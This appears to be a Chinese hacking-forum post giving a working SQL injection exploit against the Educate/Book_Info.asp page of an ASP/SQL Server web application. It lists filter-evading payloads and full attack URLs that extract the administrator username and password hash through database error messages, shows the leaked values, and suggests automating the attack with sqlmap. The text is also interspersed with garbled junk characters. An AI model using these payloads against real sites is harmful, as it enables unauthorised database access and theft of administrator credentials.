漏洞出现在Educate/Book_Info.asp 9 B* L- o, B# T/ }4 N Y4 G: l
% K' P+ a3 y& H6 N
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出4 F, Q( [, G5 q) T+ |1 ~: T
2 p" v, O# i" t* C9 u# Y
exp:如下4 N# G z/ Q! y# T% d1 j$ p
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" d- X! P* X& j7 v查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 h! S4 v7 f, G" j% k
! }6 U7 ]% M! L, N. a6 ]% rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% _* u/ d5 t! l' P: e
3 t+ ^/ E; [* o. d6 T, JMicrosoft OLE DB Provider for SQL Server 错误 '80040e07') E) U% C8 u# d9 S
# I9 v% c% |* X- R% |5 i3 Q3 s1 S4 t' o将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。4 r7 Y) \3 v3 m: _
7 |5 r+ B) e. m6 }( B1 [7 Z, C k
/Educate/Book_Info.asp,行 8
( @5 [3 O. A" F. b- r- d& A 0 [9 o2 p0 E9 \. |, t2 x# L. ?
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% Z# _8 Y6 G: C" M8 ~) D , m6 M4 Z+ i, R7 I* U
Microsoft OLE DB Provider for SQL Server 错误 '80040e07') M6 N) t8 B8 |6 _
* F1 L9 G( d) b* H将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。! J; M, Z8 z. k9 ]( q
/ B6 i# j8 [& m/ X) Z: @
/Educate/Book_Info.asp,行 8! h$ X7 c' a! y B* v S g) Q0 J
|